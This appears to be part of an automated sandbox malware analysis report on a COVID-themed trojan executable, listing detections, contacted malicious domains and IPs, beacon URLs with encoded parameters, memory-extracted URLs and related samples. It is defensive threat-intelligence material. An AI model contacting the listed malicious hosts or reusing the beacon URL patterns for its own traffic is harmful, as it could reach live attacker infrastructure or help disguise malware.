0.0.Po-covid19 2372#w2..exe.70000.0.unpack	100%	Avira	HEUR/AGEN.1120329	Download File
0.2.Po-covid19 2372#w2..exe.70000.0.unpack	100%	Avira	HEUR/AGEN.1134873	Download File
3.2.Po-covid19 2372#w2..exe.9b0000.1.unpack	100%	Avira	HEUR/AGEN.1120329	Download File
2.2.Po-covid19 2372#w2..exe.130000.0.unpack	100%	Avira	HEUR/AGEN.1120329	Download File
2.0.Po-covid19 2372#w2..exe.130000.0.unpack	100%	Avira	HEUR/AGEN.1120329	Download File

Domains

Source	Detection	Scanner	Label	Link
www.johnemotions.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.jiyu-kobo.co.jp/jp/?	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/H	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmpu	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.comessed	0%	URL Reputation	safe
http://www.fontbureau.comessed	0%	URL Reputation	safe
http://www.fontbureau.comessed	0%	URL Reputation	safe
http://www.founder.com.cn/cn=	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.fontbureau.comnc./S	0%	Avira URL Cloud	safe
http://www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct	0%	Avira URL Cloud	safe
http://www.fontbureau.comalsF	0%	URL Reputation	safe
http://www.fontbureau.comalsF	0%	URL Reputation	safe
http://www.fontbureau.comalsF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/-cz	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/ghtsl	0%	Avira URL Cloud	safe
https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0e	0%	Avira URL Cloud	safe
http://www.urwpp.de.	0%	Avira URL Cloud	safe
http://www.fontbureau.com-	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/.	0%	Avira URL Cloud	safe
http://www.fontbureau.com0	0%	Avira URL Cloud	safe
http://www.fontbureau.comdic	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://crl.;	0%	Avira URL Cloud	safe
http://www.fontbureau.comessedZ	0%	Avira URL Cloud	safe
http://www.fontbureau.comF&	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.com.TTF	0%	URL Reputation	safe
http://www.fontbureau.com.TTF	0%	URL Reputation	safe
http://www.fontbureau.com.TTF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/Z	0%	Avira URL Cloud	safe
http://www.fontbureau.com=	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/~	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Z	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/S	0%	Avira URL Cloud	safe
http://www.fontbureau.comgritoe	0%	Avira URL Cloud	safe
http://www.fontbureau.comaA	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/H	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/H	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/H	0%	URL Reputation	safe
http://www.fontbureau.comzana	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/A	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/?	0%	Avira URL Cloud	safe
http://www.urwpp.de3z	0%	Avira URL Cloud	safe
http://www.fontbureau.comdl	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.comeH	0%	Avira URL Cloud	safe
http://www.urwpp.deXz	0%	Avira URL Cloud	safe
http://www.monotype.7	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/w	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.scientificimaginetics.com	154.92.73.140	true	true		unknown
thesaltlifestyle.com	34.102.136.180	true	true		unknown
www.aduhelmfinancialsupport.com	165.160.13.20	true	false		high
www.johnemotions.com	104.24.109.70	true	true	0%, Virustotal, Browse	unknown
www.steelyourselfshop.net	unknown	unknown	true		unknown
www.thesaltlifestyle.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.aduhelmfinancialsupport.com/p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1	false		high
http://www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct	true	Avira URL Cloud: safe	unknown
http://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1	true	Avira URL Cloud: safe	unknown
http://www.scientificimaginetics.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.jiyu-kobo.co.jp/jp/?	Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/H	Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmpu	Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comessed	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn=	Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comnc./S	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comalsF	Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/-cz	Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/ghtsl	Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/	msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0e	Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de.	Po-covid19 2372#w2..exe, 00000000.00000003.227697228.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com-	Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/.	Po-covid19 2372#w2..exe, 00000000.00000003.222363668.0000000007913000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com0	Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comdic	Po-covid19 2372#w2..exe, 00000000.00000003.226140808.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/	Po-covid19 2372#w2..exe, 00000000.00000003.225390108.000000000791B000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.;	explorer.exe, 00000004.00000000.281618251.000000000F5C4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.comessedZ	Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comF&	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fonts.com	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.de	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com.TTF	Po-covid19 2372#w2..exe, 00000000.00000003.227104715.000000000791B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/Z	Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com=	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/jp/~	Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Z	Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.galapagosdesign.com/	Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228852233.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228815722.0000000007942000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/S	Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comgritoe	Po-covid19 2372#w2..exe, 00000000.00000003.225158941.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comaA	Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/H	Po-covid19 2372#w2..exe, 00000000.00000003.222719848.000000000791A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comzana	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/A	Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comd	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/?	Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de3z	Po-covid19 2372#w2..exe, 00000000.00000003.224891432.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comdl	Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comeH	Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deXz	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.monotype.7	Po-covid19 2372#w2..exe, 00000000.00000003.225451084.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers/cabarga.htmlN	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/w	Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Po-covid19 2372#w2..exe, 00000000.00000003.226091255.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comoitu	Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.html	Po-covid19 2372#w2..exe, 00000000.00000003.226977608.0000000007942000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.226763972.0000000007942000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comlic0	Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deo	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comdZ	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/-	Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/	Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comow	Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn$	Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
154.92.73.140	unknown	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
165.160.13.20	unknown	United States	19574	CSCUS	false
104.24.109.70	unknown	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338985
Start date:	13.01.2021
Start time:	08:49:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Po-covid19 2372#w2..exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/1@6/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 17.4% (good quality ratio 14.6%) Quality average: 67.6% Quality standard deviation: 35.6%
HCA Information:	Successful, ratio: 96% Number of executed functions: 145 Number of non-executed functions: 166
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 52.255.188.83, 92.122.144.200, 51.11.168.160, 40.88.32.150, 92.122.213.194, 92.122.213.247, 8.248.131.254, 8.253.207.120, 67.26.83.254, 8.253.95.120, 8.248.137.254, 20.54.26.129, 168.61.161.212, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:50:23	API Interceptor	1x Sleep call for process: Po-covid19 2372#w2..exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
34.102.136.180	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
	xrxSVsbRli.exe	Get hash	malicious	Browse	www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux
	3S1VPrT4IK.exe	Get hash	malicious	Browse	www.qiemfsolutions.com/xle/?D8bDL=df7alruH/sVOZEWxdb4cimNlzghqglI+JQbYN3M53vXLFmJTlVjRvjRu86vT99I8VeyiFG/dAw==&nbph=uzu87Xq
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	www.eventsdonevirtually.com/c8so/?Wx=JxEHfAEgu9b4xQJDcyjTWSaEjlpoxhWg+fCl4c24OKbRsAQRgKKiPuXHFwp0UmB835cw&vB=lhr0E
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	www.multipleofferonline.com/nki/?-Z1l=5yWKC4X4OOjUIUftTYCRYdpq8XI+R2ST+EfenRWsFQpL7Lmr0RV0+cHmGR5gosgcZWiS+YlJJw==&5ju=UlSpo
